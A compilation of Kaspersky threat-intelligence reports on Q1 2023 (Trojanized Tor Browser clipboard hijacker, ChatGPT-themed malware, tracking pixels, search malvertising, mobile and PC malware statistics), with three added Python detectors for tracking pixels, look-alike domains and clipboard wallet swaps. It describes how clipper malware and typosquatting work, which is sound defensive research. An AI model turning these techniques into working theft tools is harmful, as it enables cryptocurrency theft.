We recently discovered an ongoing cryptocurrency theft campaign affecting more than 15,000 users across 52 countries. The attackers used a technique that has been around for more than a decade and was originally used by banking Trojans to replace bank account numbers. However, in the recent campaign, the attackers used a Trojanized version of the Tor Browser to steal cryptocurrency.

The target downloads the Trojanized version of the Tor Browser from a third-party resource containing a password protected RAR archive — the password is used to prevent it being detected by security solutions. Once the file is dropped onto the target’s computer, it registers itself in the system’s auto-start and masquerades as an icon for a popular application, such as uTorrent.

Trojanized Tor Browser extracting and launching a malware payload

The malware waits until there is a wallet address in the clipboard and then replaces a portion of the entered clipboard contents with the cybercriminal’s own wallet address.

Our analysis of existing samples suggests that the estimated loss for those targeted in the campaign is at least $400,000, but the actual amount stolen could be much greater, as our research focused only on Tor Browser abuse. Other campaigns may use different software and malware delivery methods, as well as other types of wallets.

We haven’t been able to identify a single web site that hosts the installer, so it is probably distributed either via torrent downloads or some other software downloader. The installers coming from the official Tor Project are digitally signed and didn’t contain any signs of such malware. So, to stay safe, you should download software only from reliable and trusted sources. Even where someone has downloaded the Trojanized version, a good anti-virus product should be able to detect it.

There is also a way to check if your system is compromised with malware of the same class. Put the following “Bitcoin address” into Notepad:
bc1heymalwarehowaboutyoureplacethisaddress

Now press Ctrl+C and Ctrl+V. If the address changes to something else — the system is probably compromised by clipboard-injector malware and is dangerous to use.

Bitcoin address replaced by malware after pasting in an infected system

We would recommend that you scan your system with security software. If you want to have full confidence that no hidden backdoors remain, once a system has been compromised, you should not trust it until it has been rebuilt.

It seems that everyone’s chatting about ChatGPT

Since OpenAI opened up its large GPT-3 language model to the general public through ChatGPT, interest in the project has soared, as people rushed to explore its possibilities, including writing poetry, engaging in dialogue, providing information, creating content for web sites and more.

There has also been a good deal of discussion about the potential impact of ChatGPT on the threat landscape.

Given ChatGPT’s ability to mimic human interaction, it’s likely that automated spear-phishing attacks using ChatGPT are already taking place. ChatGPT allows attackers to generate persuasive, personalized e-mails on an industrial scale. Moreover, any responses from the target of the phishing message can easily be fed into the chatbot’s model, producing a compelling follow-up in seconds. That said, while ChatGPT may make it easier for cybercriminals to churn out phishing messages, it doesn’t change the nature of this form of attack.

Cybercriminals have also reported on underground hacker forums how they have used ChatGPT to create new Trojans. Since the chatbot is able to write code, if someone describes a desired function (for example, “save all passwords in file X and send via HTTP POST to server Y”), they can create a simple infostealer without having any programming skills. However, such Trojans are likely to be primitive and could contain bugs that make them less effective. For now, at least, chatbots can only compete with novice malware writers.

We also uncovered a malicious campaign that sought to exploit the growing popularity of ChatGPT. Fraudsters created social network groups that mimicked communities of enthusiasts. These groups also contained fake credentials for pre-created accounts that purported to provide access to ChatGPT. The groups contained a plausible link inviting people to download a fake version of ChatGPT for Windows.

The malicious link installs a Trojan that steals account credentials stored in Chrome, Edge, Firefox, Brave and other browsers.

Since security researchers frequently publish reports about threat actors, including TTPs (Tactics, Techniques and Procedures) and other indicators, we decided to find out what ChatGPT already knows about threat research and whether it can help identify common malicious tools and IoCs (Indicators of Compromise), such as malicious hashes and domains.

The responses for host-based artifacts looked promising, so we instructed ChatGPT to write some code to extract various metadata from a test Windows system and then to ask itself whether the metadata was an IoC:

Since certain code snippets were handier than others, we continued developing this proof of concept manually: we filtered the output for events where the ChatGPT response contained a “yes” statement regarding the presence of an IoC, added exception handlers and CSV reports, fixed small bugs and converted the snippets into individual cmdlets, which produced a simple IoC scanner, HuntWithChatGPT.psm1, capable of scanning a remote system via WinRM.

While IoC scanning implemented this way may not currently be a very cost-effective solution at $15 to $20 per host for the OpenAI API, it shows interesting interim results and reveals opportunities for future research and testing.

The impact of AI on our lives will extend far beyond the current capabilities of ChatGPT and other current machine learning projects. Ivan Kwiatkowski, a researcher in our Global Research and Analysis Team, recently explored the likely scope of the changes we can expect in the long term. These perspectives not only include the productivity gains offered by AI, but the social, economic and political implications of the changes it is likely to usher in.

Tracking our digital footprints

We’ve become used to service providers, marketing agencies and analytical companies tracking our mouse clicks, social media posts and browser and streaming services history. Companies do this for a number of reasons. They want to understand our preferences better, and suggest products and services that we’re more likely to buy. They do it to find out which images or text we focus on most. They also sell on our online behavior and preferences to third parties.

The tracking is done using web beacons (aka tracker pixels and spy pixels). The most popular tracking technique is to insert a tiny image, 1×1 or even 0×0 pixels in size, into an e-mail, application, or web page. The e-mail client or browser makes a request to download the image from the server by transmitting information about you, which the server records. This includes the time, device, operating system, browser, and the page from which the pixel was downloaded. This is how the operator of the beacon learns that you opened the e-mail or web page, and how. Often a small piece of JavaScript inside the web page, which can collect even more detailed information, is used instead of a pixel. These beacons, placed on every page or application screen, make it possible for companies to follow you wherever you go on the web.
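The pixel technique above, turned into a detector as an added example (not the report's code): parse the <img> tags of an HTML e-mail and flag those that are 1×1 or 0×0, hidden by style, or that fetch a remote image whose URL carries a long opaque token. The token length threshold and the sample HTML are assumptions constructed for the example.

```python
"""Finding tracking pixels in an HTML e-mail or page (added example, not from the
report). Flags <img> tags that are 1x1 or 0x0, hidden by style, or that load a
remote image whose URL carries a long opaque token. Threshold and sample HTML are
assumptions/constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit


class _ImgCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append(dict(attrs))


def _dimension(value) -> int:
    """'1', '1px', ' 0 ' -> integer; missing or non-numeric -> -1."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else -1


def beacon_reasons(attrs: dict, token_len: int = 20) -> list:
    """Why one <img> looks like a beacon; empty list means it looks like content."""
    reasons = []
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if 0 <= w <= 1 and 0 <= h <= 1:
        reasons.append(f"{w}x{h} pixel")
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("hidden by style")
    parts = urlsplit(attrs.get("src") or "")
    if parts.scheme in ("http", "https"):
        # A per-recipient identifier usually rides in the query or the file name.
        values = [v for vs in parse_qs(parts.query).values() for v in vs]
        last = parts.path.rsplit("/", 1)[-1].split(".")[0]
        if any(len(v) >= token_len for v in values + [last]):
            reasons.append("remote image with opaque token")
    return reasons


def find_beacons(html: str) -> list:
    """Return [(src, reasons)] for every <img> that looks like a tracker."""
    p = _ImgCollector()
    p.feed(html)
    out = []
    for attrs in p.images:
        reasons = beacon_reasons(attrs)
        if reasons:
            out.append((attrs.get("src", ""), reasons))
    return out


# Constructed sample message: one real logo and two beacons.
SAMPLE_HTML = """<html><body>
<p>Your order has shipped.</p>
<img src="https://cdn.example/logo.png" width="120" height="40" alt="logo">
<img src="https://track.example/open?u=9f2c1a7b3e4d5c6b7a8f9e0d1c2b3a4f&c=42" width="1" height="1" style="display:none">
<img src="https://mail.example/px/7c3a9e1f2b4d6c8a0e5f1b3d7a9c2e4f.gif" width="0" height="0">
</body></html>"""

if __name__ == "__main__":
    for src, why in find_beacons(SAMPLE_HTML):
        print(src, "->", ", ".join(why))
```

Mail clients that block remote images defeat all three variants at once, which is why that setting is the usual first recommendation; the detector is for the cases where images must be loaded and the question is which ones to strip.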

In our recent report on web trackers, we listed the 20 most common beacons found on web sites and in e-mail. The data for web beacons is based on anonymous statistics from the Do Not Track (DNT) component of Kaspersky consumer products, which blocks the loading of web site trackers. Most of the companies have at least some connection to digital advertising and marketing, including tech giants such as Google, Microsoft, Amazon and Oracle.

The data for e-mail beacons is from anonymized anti-spam detection data from Kaspersky mail products. The companies in the list are either e-mail service providers (ESP) or customer relationship management (CRM) companies.

The information collected using trackers is of value not just to legitimate companies, but also to cybercriminals. If they are able to obtain such information — for example, as a result of a data leak — they can use it to hijack online accounts or craft convincing fake e-mails. Attackers also deploy web beacons of their own. You can find information on how to protect yourself from tracking here.

Malvertising through search engines

In recent months, we have observed an increase in the number of malicious campaigns that use Google Ads to distribute and deliver malware. At least two different stealers, Rhadamanthys and RedLine, abused paid search promotion in order to deliver malicious payloads to victims’ computers.

Fake AMD and Blender 3D websites in search results

Both campaigns use the same technique: mimicking the web site of well-known software such as Notepad++ or Blender 3D. The threat actors clone legitimate software web sites and register look-alike domains using “typosquatting” (misspelled brand or company names) or “combosquatting” (the brand name combined with arbitrary extra words) to make the sites look legitimate. They then pay to promote the site in the search engine so that it appears at the top of the results — a technique known as “malvertising”.
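The two squatting patterns above can be checked mechanically. The following Python example is added here (it is not Kaspersky’s code) and classifies a domain against a short brand list as legitimate, a typosquat (the brand name with a typo, or the exact name on a different TLD) or a combosquat (the brand name plus extra words). The brand list and the candidate domains are constructed; the campaign’s actual domains are not reproduced.

```python
"""Classify look-alike domains as typosquats or combosquats against a brand list.

Added example, not code from the report. BRANDS and the domains in main() are
constructed; the campaign's real domains are not reproduced here.
"""
import re

# brand key -> the legitimate registrable domain (constructed list)
BRANDS = {
    "notepad-plus-plus": "notepad-plus-plus.org",
    "blender": "blender.org",
    "amd": "amd.com",
}


def registrable_label(fqdn):
    """Second-level label, e.g. 'blender3d-download' for blender3d-download.com.

    Good enough for plain gTLDs; ccTLD second-level domains such as co.uk
    need a public suffix list, which is out of scope here.
    """
    parts = fqdn.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def edit_distance(a, b):
    """Levenshtein distance; one or two edits is the usual typo budget."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain):
    """Return (verdict, brand): legitimate | typosquat | combosquat | none."""
    d = domain.lower().strip(".")
    for brand, legit in BRANDS.items():
        if d == legit or d.endswith("." + legit):
            return ("legitimate", brand)
    label = registrable_label(d)
    tokens = re.split(r"[-_]", label)
    compact = label.replace("-", "").replace("_", "")
    for brand in BRANDS:
        b = brand.replace("-", "")
        if compact == b:
            return ("typosquat", brand)  # exact brand name on the wrong TLD
        # combosquat: brand plus extra words; short brands must be a whole token
        if b in tokens or (len(b) >= 5 and b in compact and len(compact) > len(b)):
            return ("combosquat", brand)
        # typosquat: a keystroke or two away from the brand name
        if edit_distance(compact, b) <= (2 if len(b) > 5 else 1):
            return ("typosquat", brand)
    return ("none", None)


if __name__ == "__main__":
    for d in ("www.blender.org", "blender3d-download.com", "blendr.org",
              "notepad-plus-plus-download.org", "amd-drivers-download.com",
              "examdate.com"):
        print(f"{d:32} {classify(d)}")
```

Short brand names are the weak spot: with a one-edit budget, an unrelated three-letter domain one keystroke away from “amd” would also be flagged, so a production version needs a brand-specific allowlist and a public suffix list in addition to these rules.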

Fake Blender 3D web pages

The distribution of malware that we have seen suggests that threat actors are targeting victims, both individual and corporate, across the globe.

IT threat evolution Q1 2023. Mobile statistics https://securelist.com/it-threat-evolution-q1-2023-mobile-statistics/109893/ Wed, 07 Jun 2023 08:00:26 +0000

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q1 2023:

  • 4,948,522 mobile malware, adware and riskware attacks were blocked.
  • The most common threat to mobile devices was adware: 34.8% of all detected threats.
  • 307,529 malicious installation packages were detected, of which:
    • 57,601 packages were related to mobile banking Trojans,
    • 1767 packages were mobile ransomware Trojans.

Quarterly highlights

Malware, adware and unwanted software attacks on mobile devices were down slightly year-on-year. Kaspersky mobile security systems thwarted a total of 4.9 million attacks in Q1 2023.

Number of attacks targeting users of Kaspersky mobile solutions, Q3 2021–Q1 2023 (download)

During the period in question, we detected several mobile photo editors on Google Play, which, besides their legitimate features, contained a dropper hidden inside a heavily obfuscated library. The dropper payload was designed to subscribe the user to paid services and intercept notifications.

We assigned our new find the verdict of Trojan.AndroidOS.Subscriber.aj and alerted Google Play, which then took down the malicious files. Kaspersky systems detect new files associated with this Trojan as Trojan.AndroidOS.Fleckpe.

Also in the first quarter, we came across Trojan.AndroidOS.Bithief.f, a malicious modification of Skype that steals the victim’s cryptocurrency. The Trojan monitors the device clipboard and sends any crypto wallet address it detects to the command-and-control server. The server responds with the attacker’s wallet address, which the malware substitutes for the original one, so an inattentive user ends up sending their cryptocurrency to the attackers.
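The clipper behaviour described above is simple to model, and so is a check for it. The Python example below is added here and is not Kaspersky or Bithief code: it validates legacy Bitcoin addresses with Base58Check and Ethereum addresses by format only, then flags the tell-tale event, a valid address replaced in the clipboard by a different valid address of the same type within a couple of seconds of being copied. The addresses and the clipboard timeline are constructed (all-zero and all-one keys, so no real wallet is referenced), and the C2 exchange is not modelled.

```python
"""Detect a clipper-style wallet-address swap in a sequence of clipboard snapshots.

Added example, not Kaspersky or Bithief code. The addresses and the timeline are
constructed; the Trojan's C2 protocol is not modelled.
"""
import hashlib
import re

_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58check_encode(version, payload):
    """Base58Check-encode version byte + payload (used here to build sample addresses)."""
    raw = bytes([version]) + payload
    raw += hashlib.sha256(hashlib.sha256(raw).digest()).digest()[:4]
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = _B58[r] + out
    leading_zero_bytes = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * leading_zero_bytes + out


def _b58check_ok(addr):
    """Verify the 4-byte double-SHA256 checksum of a 25-byte Base58Check address."""
    n = 0
    for ch in addr:
        if ch not in _B58:
            return False
        n = n * 58 + _B58.index(ch)
    try:
        raw = n.to_bytes(25, "big")  # leading '1's decode to leading zero bytes
    except OverflowError:
        return False
    return hashlib.sha256(hashlib.sha256(raw[:-4]).digest()).digest()[:4] == raw[-4:]


def address_type(text):
    """Return 'btc' (legacy 1.../3..., checksum verified), 'eth' (format only) or None.

    EIP-55 mixed-case checksums need keccak-256, which the standard library lacks,
    so Ethereum addresses are accepted on format alone here.
    """
    s = text.strip()
    if re.fullmatch(r"[13][1-9A-HJ-NP-Za-km-z]{25,34}", s) and _b58check_ok(s):
        return "btc"
    if re.fullmatch(r"0x[0-9a-fA-F]{40}", s):
        return "eth"
    return None


def detect_swaps(snapshots, window_s=2.0):
    """snapshots: [(time_s, clipboard_text), ...] in order of observation.

    A clipper overwrites the clipboard right after the user copies an address, so
    flag any valid address replaced by a *different* valid address of the same
    type within window_s seconds. A user re-copying takes longer and usually
    copies the same text again.
    """
    alerts = []
    for (t0, a), (t1, b) in zip(snapshots, snapshots[1:]):
        ta, tb = address_type(a), address_type(b)
        if ta is not None and ta == tb and a != b and (t1 - t0) <= window_s:
            alerts.append({"t": t1, "type": ta, "copied": a, "replaced_with": b})
    return alerts


# Constructed sample: all-zero / all-one keys, so no real wallet is referenced.
VICTIM_BTC = b58check_encode(0x00, bytes(20))
ATTACKER_BTC = b58check_encode(0x00, bytes([0x01]) * 20)
VICTIM_ETH = "0x" + "00" * 20
ATTACKER_ETH = "0x" + "11" * 20
SAMPLE_SNAPSHOTS = [
    (0.0, "meeting at 10"),
    (10.0, VICTIM_BTC), (10.4, ATTACKER_BTC),   # swapped 0.4 s after copy: clipper
    (20.0, VICTIM_ETH), (27.0, ATTACKER_ETH),   # 7 s later: user copied another address
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_SNAPSHOTS):
        print(alert)
```

The timing window is the weak point: a clipper that waits for the paste rather than rewriting the clipboard immediately would slip past it, which is why wallet apps also show the first and last characters of the destination address for the user to compare against the source.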

Mobile threat statistics

After a noticeable decrease in malicious installers in Q4 2022 due to reduced activity by Trojan-Dropper.AndroidOS.Ingopack, we observed a minor increase in new malware varieties.

Number of detected malicious installation packages, Q1 2022–Q1 2023 (download)

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q4 2022 and Q1 2023 (download)

Adware was back at the top of the rankings with 34.8%. The most widespread adware families in Q1 2023 were MobiDash (22.5%), HiddenAd (21.9%) and Adlo (12.4%).

Share of users attacked by a certain type of threat out of all attacked mobile users in Q4 2022 and Q1 2023 (download)

The share of users attacked by mobile Trojans increased in the first quarter, mostly due to the malware that we detect as Trojan.AndroidOS.Fakemoney.v and Trojan.AndroidOS.Adinstall.l. The former is a fake investment app that harvests victims’ payment details, and the latter, adware that comes pre-installed on certain devices, capable of downloading and running code (typically ads).

TOP 20 mobile malware programs

Note that the malware rankings below exclude riskware or PUAs, such as RiskTool or adware.

Rank | Verdict | %* Q4 2022 | %* Q1 2023 | Difference in pp | Change in ranking
1 | DangerousObject.Multi.Generic | 16.52 | 13.27 | -3.24 |
2 | Trojan-Spy.AndroidOS.Agent.acq | 4.29 | 8.60 | +4.31 | +5
3 | Trojan.AndroidOS.Boogr.gsh | 6.92 | 8.39 | +1.47 | +1
4 | Trojan.AndroidOS.Fakemoney.v | 1.13 | 7.48 | +6.35 | +19
5 | Trojan.AndroidOS.GriftHorse.l | 8.29 | 6.13 | -2.17 | -3
6 | Trojan.AndroidOS.Generic | 7.68 | 5.95 | -1.73 | -3
7 | Trojan-Dropper.AndroidOS.Hqwar.hd | 3.06 | 4.54 | +1.49 | +2
8 | Trojan-Downloader.AndroidOS.Agent.mh | 0.00 | 3.68 | +3.68 |
9 | Trojan-Spy.AndroidOS.Agent.aas | 6.18 | 3.64 | -2.53 | -3
10 | DangerousObject.AndroidOS.GenericML | 2.37 | 3.46 | +1.10 |
11 | Trojan.AndroidOS.Adinstall.l | 0.28 | 3.36 | +3.08 |
12 | Trojan-Dropper.AndroidOS.Agent.sl | 3.50 | 2.10 | -1.40 | -4
13 | Trojan.AndroidOS.Fakemoney.u | 0.67 | 1.64 | +0.97 | +25
14 | Trojan-Banker.AndroidOS.Bian.h | 1.43 | 1.52 | +0.10 | +3
15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.25 | 1.47 | +0.22 | +6
16 | Trojan-Downloader.AndroidOS.Agent.kx | 1.53 | 1.43 | -0.10 | -3
17 | Trojan-SMS.AndroidOS.Fakeapp.d | 6.43 | 1.32 | -5.11 | -12
18 | Trojan.AndroidOS.Piom.auar | 0.00 | 1.06 | +1.06 |
19 | Trojan-Dropper.AndroidOS.Wroba.o | 1.51 | 1.03 | -0.47 | -4
20 | Trojan-Dropper.AndroidOS.Hqwar.gf | 0.14 | 0.98 | +0.84 |

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

DangerousObject.Multi.Generic (13.27%), the verdict we assign to miscellaneous unrelated malware that we detect with our cloud technology, topped the rankings as usual. This was followed by Trojan-Spy.AndroidOS.Agent.acq (8.60%), a malicious modification of WhatsApp that secretly monitors notifications the user receives.

Trojan.AndroidOS.Boogr.gsh (8.39%), a collective verdict for miscellaneous malware that we detect with our machine learning technology, was in third place. This verdict is analogous to DangerousObject.AndroidOS.GenericML (3.46%), but unlike the latter it is assigned on the basis of analysis of a similar file within the Kaspersky infrastructure.

Next were the previously mentioned fake investment app Trojan.AndroidOS.Fakemoney.v (7.48%) and the subscription Trojan described in many past reports — Trojan.AndroidOS.GriftHorse.l (6.13%).

Regional malware

This section describes mobile malware that mostly targets those who reside in certain countries.

Verdict Country* %**
Trojan-Banker.AndroidOS.Banbra.aa Brazil 99.43
Trojan-Spy.AndroidOS.SmsThief.td Indonesia 99.08
Trojan-Banker.AndroidOS.Bray.n Japan 99.07
Trojan-Banker.AndroidOS.Banbra.ac Brazil 98.85
Trojan-Banker.AndroidOS.Agent.la Turkey 98.62
Trojan.AndroidOS.Hiddapp.da Iran 97.82
Trojan.AndroidOS.Hiddapp.bk Iran 96.95
Trojan.AndroidOS.GriftHorse.ai Kazakhstan 96.26
Trojan-Dropper.AndroidOS.Hqwar.hc Turkey 95.93
Trojan.AndroidOS.FakeGram.a Iran 95.73
Trojan-SMS.AndroidOS.Agent.adr Iran 95.07
Trojan.AndroidOS.Hiddapp.bn Iran 95.01
Trojan.AndroidOS.Piom.aiuj Iran 90.33
Trojan-Banker.AndroidOS.Cebruser.san Turkey 88.28
Trojan.AndroidOS.Hiddapp.cg Iran 88.25
Backdoor.AndroidOS.Basdoor.c Iran 86.44
Trojan-Dropper.AndroidOS.Wroba.o Japan 83.80

* Country where the malware was most active
** Unique users attacked by the malware in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same malware

Members of the Banbra malware family continued to attack users in Brazil in Q1 2023. These are banking Trojans that abuse Accessibility features to interact with other applications installed on the device.

In Indonesia, users encountered SmsThief.td SMS spies, which spread under the guise of public services, system apps or marketplaces.

Wroba banking Trojans, which we have covered several times, and the Bray mobile malware distributed under the guise of useful apps, such as call blockers, were busy in Japan.

Turkish users found themselves targeted by several banking Trojans, including the fairly primitive Agent.la and the well-known Cebruser. The Hqwar dropper operating in Turkey is also typically used to deliver various banking malware.

Users in Iran had to deal with hidden, hard-to-remove Hiddapp programs and the FakeGram family, third-party Telegram clients that automatically add users to channels they do not intend to join.

A variant of the GriftHorse subscription Trojan was mostly active in Kazakhstan. Focusing on users in a certain country is expected behavior for this Trojan family, as phishing messages used to lure the user into subscription to a fake service have to be localized.

Mobile banking Trojans

The number of banking Trojan installers began to increase again, exceeding 57,000 in Q1 2023.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q1 2022–Q1 2023 (download)

TOP 10 mobile bankers

Rank | Verdict | %* Q4 2022 | %* Q1 2023 | Difference in pp | Change in ranking
1 | Trojan-Banker.AndroidOS.Bian.h | 29.90 | 30.81 | +0.91 |
2 | Trojan-Banker.AndroidOS.Faketoken.pac | 6.31 | 10.15 | +3.84 |
3 | Trojan-Banker.AndroidOS.Agent.eq | 4.59 | 5.51 | +0.92 | +1
4 | Trojan-Banker.AndroidOS.Agent.ep | 3.57 | 4.40 | +0.84 | +2
5 | Trojan-Banker.AndroidOS.Svpeng.q | 5.71 | 4.05 | -1.66 | -2
6 | Trojan-Banker.AndroidOS.Banbra.aa | 1.80 | 3.72 | +1.92 | +6
7 | Trojan-Banker.AndroidOS.Agent.la | 0.16 | 3.08 | +2.92 | +85
8 | Trojan-Banker.AndroidOS.Banbra.ac | 0.57 | 2.46 | +1.89 | +23
9 | Trojan-Banker.AndroidOS.Asacub.ce | 3.46 | 2.17 | -1.29 | -1
10 | Trojan-Banker.AndroidOS.Agent.cf | 1.63 | 1.91 | +0.28 | +5

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

Q1 2023 saw a noticeable quarter-on-quarter increase in activity by the aforementioned mobile malware Agent.la (3.08%) and Banbra (2.46%), both of which landed outside the TOP 10 in Q4 2022.

Mobile ransomware Trojans

The number of mobile ransomware programs remained low after dropping in 2022, apparently because the niche had ceased to be as profitable for scammers as it once had been.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q1 2022 — Q1 2023 (download)

TOP 10 mobile ransomware verdicts

Rank | Verdict | %* Q4 2022 | %* Q1 2023 | Difference in pp | Change in ranking
1 | Trojan-Ransom.AndroidOS.Pigetrl.a | 54.61 | 62.22 | +7.60 |
2 | Trojan-Ransom.AndroidOS.Small.as | 5.42 | 3.65 | -1.77 |
3 | Trojan-Ransom.AndroidOS.Rkor.dl | 0.00 | 2.23 | +2.23 |
4 | Trojan-Ransom.AndroidOS.Congur.y | 1.00 | 1.78 | +0.78 | +19
5 | Trojan-Ransom.AndroidOS.Agent.bw | 2.19 | 1.60 | -0.59 | -1
6 | Trojan-Ransom.AndroidOS.Fusob.h | 2.04 | 1.55 | -0.49 | +1
7 | Trojan-Ransom.AndroidOS.Rkor.pac | 1.19 | 1.50 | +0.32 | +9
8 | Trojan-Ransom.AndroidOS.Rkor.di | 0.62 | 1.46 | +0.84 | +30
9 | Trojan-Ransom.AndroidOS.Rkor.bi | 1.62 | 1.46 | -0.16 | +2
10 | Trojan-Ransom.AndroidOS.Small.o | 2.14 | 1.32 | -0.82 | -4

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

The distribution of mobile ransomware apps changed little from the previous quarter. Pigetrl (62.22%) still accounted for the lion’s share of threats, followed by Small.as (3.65%) and various modifications of Rkor.

IT threat evolution in Q1 2023. Non-mobile statistics https://securelist.com/it-threat-evolution-q1-2023-pc-statistics/109917/ Wed, 07 Jun 2023 08:00:18 +0000

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q1 2023:

  • Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
  • Web Anti-Virus detected 246,912,694 unique URLs as malicious.
  • Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 106,863 unique users.
  • Ransomware attacks were defeated on the computers of 60,900 unique users.
  • Our File Anti-Virus detected 43,827,839 unique malicious and potentially unwanted objects.

Financial threats

Financial threat statistics

In Q1 2023, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 106,863 unique users.

Number of unique users attacked by financial malware, Q1 2023 (download)

Geography of financial malware attacks

To evaluate and compare the risk of being infected by banking Trojans or ATM/POS malware worldwide, for each country and territory, we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory.

TOP 10 countries/territories by share of attacked users

Country/territory* %**
1 Turkmenistan 4.7
2 Afghanistan 4.6
3 Paraguay 2.8
4 Tajikistan 2.8
5 Yemen 2.3
6 Sudan 2.3
7 China 2.0
8 Switzerland 2.0
9 Egypt 1.9
10 Venezuela 1.8

* Excluded are countries/territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country/territory.

TOP 10 banking malware families

Name Verdicts %*
1 Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 28.9
2 Emotet Trojan-Banker.Win32.Emotet 19.5
3 Zbot/Zeus Trojan-Banker.Win32.Zbot 18.3
4 Trickster/Trickbot Trojan-Banker.Win32.Trickster 6.5
5 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 5.9
6 Danabot Trojan-Banker.Win32.Danabot 2.3
7 IcedID Trojan-Banker.Win32.IcedID 1.9
8 SpyEyes Trojan-Spy.Win32.SpyEye 1.6
9 Gozi Trojan-Banker.Win32.Gozi 1.1
10 Qbot/Qakbot Trojan-Banker.Win32.Qbot 1.1

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Ransomware programs

Attacks on Linux and VMWare ESXi servers

An increasing number of ransomware families are extending their reach beyond Windows, their traditional target, by adding support for other operating systems. In Q1 2023, we discovered builds from several ransomware families intended to run on Linux and VMware ESXi servers, namely ESXiArgs (a new family), Nevada (a rebranding of Nokoyawa, which is written in Rust), Royal and IceFire.

As a result, the arsenals of most professional extortion groups today include ransomware builds for several platforms, which maximizes the damage they can inflict on their victims.

Progress in combating cybercrime

Europol and the U.S. Department of Justice announced that as a result of a joint operation with the FBI that started in July 2022, the FBI penetrated networks belonging to the Hive group and obtained decryption keys for more than 1,300 victims. The law enforcement agencies also obtained information about 250 Hive affiliates and seized several servers belonging to the group.

The Netherlands Police arrested three individuals suspected of stealing confidential data and extorting €100,000 to €700,000 from each victim company.

Europol announced it had arrested two suspected core members of DoppelPaymer during a joint operation with the FBI and the law enforcement agencies of Germany, Ukraine, and the Netherlands. The team also seized hardware, which the law enforcement agencies will inspect during further investigation.

Conti-based Trojan decrypted

Kaspersky analysts released a utility for decrypting files affected by a Trojan known to researchers as MeowCorp. The malware was compiled from Conti source code, which was published last year. An archive containing the secret keys, 258 in all, was posted on an online forum. We added these, along with data decryption code, to the latest version of RakhniDecryptor.

Most prolific groups

This section looks at ransomware groups that engage in so-called “double extortion”, that is stealing confidential data in addition to encrypting it. Most of these groups target large companies, and many maintain a DLS (data leak site), where they publish a list of organizations they have attacked. The diagram below reflects the most prolific extortion gangs, that is, the ones that added the largest numbers of victims to their DLSs.

Most prolific ransomware gangs. The diagram shows each group’s share of victims out of the total number of victims published on all the groups’ DLSs in Q1 2023 (download)

Number of new modifications

In Q1 2023, we detected nine new ransomware families and 3089 new modifications of the malware of this type.

Number of new ransomware modifications, Q1 2022 — Q1 2023 (download)

Number of users attacked by ransomware Trojans

In Q1 2023, Kaspersky products and technologies protected 60,900 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q1 2023 (download)

Geography of attacked users

TOP 10 countries/territories attacked by ransomware Trojans

Country/territory* %**
1 Yemen 1.50
2 Bangladesh 1.47
3 Taiwan 0.65
4 Mozambique 0.59
5 Pakistan 0.47
6 South Korea 0.42
7 Venezuela 0.32
8 Iraq 0.30
9 Nigeria 0.30
10 Libya 0.26

* Excluded are countries/territories with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country/territory.

TOP 10 most common families of ransomware Trojans

Name Verdicts* Percentage of attacked users**
1 Magniber Trojan-Ransom.Win64.Magni / Trojan-Ransom.Win32.Magni 15.73
2 WannaCry Trojan-Ransom.Win32.Wanna 12.40
3 (generic verdict) Trojan-Ransom.Win32.Gen 12.27
4 (generic verdict) Trojan-Ransom.Win32.Encoder 8.77
5 (generic verdict) Trojan-Ransom.Win32.Agent 6.65
6 (generic verdict) Trojan-Ransom.Win32.Phny 6.52
7 Stop/Djvu Trojan-Ransom.Win32.Stop 5.90
8 PolyRansom/VirLock Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom 3.74
9 (generic verdict) Trojan-Ransom.Win32.Crypren 3.52
10 (generic verdict) Trojan-Ransom.Win32.CryFile 2.06

* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data.
** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans.

Miners

Number of new miner modifications

In Q1 2023, Kaspersky solutions detected 1733 new modifications of miners.

Number of new miner modifications, Q1 2023 (download)

Number of users attacked by miners

